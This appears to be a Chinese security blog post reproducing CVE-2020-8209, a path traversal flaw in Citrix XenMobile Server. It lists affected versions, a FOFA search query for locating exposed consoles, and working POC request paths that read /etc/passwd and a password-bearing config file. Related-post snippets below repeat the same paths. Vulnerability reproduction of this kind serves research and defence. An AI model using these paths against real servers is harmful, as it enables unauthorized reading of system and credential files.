CVE-2020-8209（Citrix Endpoint Management ）XenMobile-控制台存在任意文件读取漏洞

最新推荐文章于 2021-11-10 09:23:17 发布

原创最新推荐文章于 2021-11-10 09:23:17 发布 · 425 阅读

0 ·

CC 4.0 BY-SA版权

漏洞复现专栏收录该内容

21 篇文章

订阅专栏

本文介绍了一个影响Citrix XenMobile Server的路径遍历漏洞CVE-2020-8209，该漏洞使未经授权的用户能读取系统上的任意文件。受影响的版本包括10.12之前的所有版本。

CVE-2020-8209，路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件，包括包含密码的配置文件。（该软件国外居多，国内基本很少）
RP2之前的Citrix XenMobile Server 10.12，RP4之前的Citrix XenMobile Server 10.11，RP6之前的Citrix XenMobile Server 10.10和Citrix XenMobile Server 10.9 RP5之前的访问控制不当，从而导致能够读取任意文件。

影响版本

RP2之前的XenMobile服务器10.12
RP4之前的XenMobile服务器10.11
RP6之前的XenMobile服务器10.10
10.9 RP5之前的XenMobile服务器

0x02 FOFA语法

app="XenMobile-控制台"

在这里插入图片描述

漏洞复现

POC:

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Min1996

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Citrix Endpoint Management 任意文件读取（CVE-2020-8209）复现

玄道的网安博客

11-19

677

漏洞描述 XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。 Citrix Endpoint Management 存在 任意文件读取漏洞，远程未授权攻击者通过发送特制HTTP请求，可以造成读取受影响设备上任意文件 的影响。影响版本 RP2之前的XenMobile服务器10.12 RP4之前的XenMobile服务器10.11 RP6之前.

网络安全漏洞检测_Citrix_XenMobile_目录遍历漏洞CVE-2020-8209_批量检测脚本_企业级安全测试工具_用于自动化扫描存在CVE-2020-8209漏洞的.zip

最新发布

05-25

网络安全漏洞检测_Citrix_XenMobile_目录遍历漏洞CVE-2020-8209_批量检测脚本_企业级安全测试工具_用于自动化扫描存在CVE-2020-8209漏洞的

参与评论您还未登录，请先登录后发表或查看评论

CVE-2020-8209 XenMobile 控制台存在任意文件读取漏洞

weixin_51387754的博客

11-10

2347

漏洞简介产品版本： RP2之前的XenMobile服务器10.12 RP4之前的XenMobile服务器10.11 RP6之前的XenMobile服务器10.10 10.9 RP5之前的XenMobile服务器漏洞复现 poc https://x.x.x.x:8443/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd ...

目录遍历漏洞_关于 Citrix XenMobile 目录遍历漏洞（CVE20208209）的安全告知

weixin_39793576的博客

12-16

186

XenMobile(Citrix Endpoint Management)是 Citrix 开发的企业移动性管理软件，用于管理员工的移动设备和移动应用程序，其目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。漏洞详情近日网上公开了 Citrix XenMobile 由于输入验证不足而造成的目录遍历漏洞(CVE-2020-8209)的相关信息。远程未授权攻击者...

CVE-2020-8209（Citrix Endpoint Management 任意文件读取）

thelostworld

11-17

1390

CVE-2020-8209（Citrix Endpoint Management 任意文件读取）一、漏洞描述： XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。 Citrix Endpoint Management 存在 任意文件读取漏洞，远程未授权攻击者通过发送特制HTTP请求，可以造成读取受影响设备上任意文件 的影响。二、影响版本

GitLab任意文件读取漏洞(CVE-2020-10977)POC

01-15

检测脚本

精选资源

CVE-2024-5491 和 CVE-2024-5的Citrix Netscaler/ADC-14.1- 25.56最新补丁

08-02

针对 CVE-2024-5491 和 CVE-2024-5492 的 NetScaler ADC 和 NetScaler Gateway 安全公告 CVE-2024-5491 漏洞拒绝服务，配置了 SNMP（启用了管理接口的 NSIP、CLIP 或 SNIP）的ADC 或网关设备。CVSS v4.0 基本分数：...

精选资源

CVE-2020-1938.zip

04-15

【CVE-2020-1938：Apache Tomcat AJP协议远程代码执行漏洞】 CVE-2020-1938是Apache Tomcat服务器中的一个严重安全漏洞，该漏洞允许攻击者通过AJP（Apache JServ Protocol）接口来实现远程代码执行，从而对目标系统...

tutemastev#PeiQi-WIKI-POC#Citrix XenMobile 任意文件读取 CVE-2020-82091

07-25

此漏洞允许未经授权的用户读取任意文件，包括包含密码的配置文件影响版本RP2之前的XenMobile服务器10.12RP4之前的XenMobile服务器10.11

XenMobile白皮书

05-05

Xenmobile技术介绍

CitrixXenMobile参考

07-22

教程名称：Citrix XenMobile 参考课程目录：【】Citrix XenMobile Datasheet【】XenMobile 10 产品手册【】XenMobile 10.1 产品手册【】XenMobile 10.3 产品手册【】XenMobile 9 产品手册资源太大，传百度网盘了，链接在附件中，有需要的同学自取。

XenMobile目录遍历任意文件读取(CVE-2020-8209)

MD@@nr丫卡uer

11-17

3147

XenMobile目录遍历任意文件读取(CVE-2020-8209) 利用此漏洞，可以读取Web服务器根目录之外的任意文件，包括配置文件和敏感的加密密钥。不需要授权。 POC（路径遍历） /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd 解密配置密码读取配置 /jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties 密码已加密并以

java遍历目录下所有文件_XenMobile目录遍历任意文件读取(CVE-2020-8209)

weixin_39855634的博客

12-02

181

利用此漏洞，可以读取Web服务器根目录之外的任意文件，包括配置文件和敏感的加密密钥。不需要授权。 POC（路径遍历）/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd解密配置密码读取配置/密码已加密并以以下两种格式之一存储：{aes} [base64文本]或{aes} {db} [base64文本]。加密由库/opt/sas/sw/l...

目录遍历漏洞_漏洞预警 | Citrix XenMobile 目录遍历漏洞

weixin_39854730的博客

12-16

210

0x00 漏洞编号CVE-2020-82090x01 危险等级高危0x02 漏洞概述XenMobile是Citrix开发的企业移动性管理软件，该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。Citrix Endpoint Management存在任意文件读取漏洞，远程未授权攻击者通过发送特制HTTP请求，可以读取受影响设备上任意文件。POC已公...

目录遍历漏洞_Citrix XenMobile目录遍历漏洞复现分析（CVE20208209）

weixin_39788051的博客

12-16

519

01—漏洞背景XenMobile：Citrix Endpoint Management(也称为XenMobile)用于管理员工的移动设备和移动应用程序。通常，由于Active Directory集成，它部署在网络外围并可以访问内部网络。这使XenMobile成为安全研究的主要目标。02—漏洞复现2.1 复现环境使用环境：本地搭建的环境复现版本：无2.2 环境搭建无2.3 利用条件无2...

Citrix 修复严重漏洞，可导致 XenMobile Server 遭接管

smellycat000的专栏

08-12

714

Xen 漏洞曝光

weixin_34034261的博客

06-09

286

Xen是大规模部署的虚拟化方案之一，这一轮的EMBARGO一共曝光了5个漏洞，其中最后一个已经于北京时间2014年10月1日晚上披露，这个编号CVE2014-7188的漏洞是由SUSE Linux的工程师Jan Beulich发现的，Xen和KVM的实现略有不同，在x86架构上，其hypervisor是运行于RING-0的，而传统的linux内核hos...

XenMobile 10和NetScaler集成配置

weixin_34237596的博客

04-04

209

XenMobile 10当中，如果我们需要发布到外网，或者我们有多台XenMobile Server，我们必须要借助外部的设备。这个设备集成最好就是NetScaler。在NetScaler中，NetScaler 10.5 build 54.9的版本当中以及以上版本集成了XenMobile 10的向导，我们只需要按照向导进行配置就可，简单快捷。如果是一下版本，那么我们必须...